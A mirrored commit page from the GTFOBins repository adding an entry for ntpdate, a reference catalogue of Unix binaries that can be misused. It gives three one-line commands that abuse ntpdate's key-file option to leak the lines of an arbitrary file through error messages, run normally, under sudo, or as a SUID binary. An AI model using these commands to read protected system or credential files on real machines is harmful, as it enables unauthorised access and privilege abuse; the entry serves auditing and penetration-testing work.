1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2025-03-14 19:48:20 +01:00
Bagas Mukti e988dbb8fa
Add ntpdate
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2023-12-23 13:22:22 +01:00

396 B

description functions
The file is actually parsed and lines are leaked through error messages.
file-read sudo suid
code
LFILE=file_to_read ntpdate -a x -k $LFILE -d localhost
code
LFILE=file_to_read sudo ntpdate -a x -k $LFILE -d localhost
code
LFILE=file_to_read ./ntpdate -a x -k $LFILE -d localhost